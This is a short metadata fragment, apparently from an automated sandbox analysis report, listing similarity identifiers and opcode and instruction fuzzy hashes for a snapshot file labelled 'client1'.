                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: Object_$Track
                                                    • String ID: 3.2.0
                                                    • API String ID: 16854473-1786766648
                                                    • Opcode ID: 767dd7ab98994f43239e4e329e749c2ad7475791c86a6fb4d160e6b955e6c056
                                                    • Instruction ID: c304912133d6b82b575715ab2c233b7aa49df1e70af7ddfa46917f94f6248795
                                                    • Opcode Fuzzy Hash: 767dd7ab98994f43239e4e329e749c2ad7475791c86a6fb4d160e6b955e6c056
                                                    • Instruction Fuzzy Hash: B4E0EDA4B0BB06E5EF16AF31E45406A23ACBF18B04B4501B9CD5D02350EF3CE566C2B0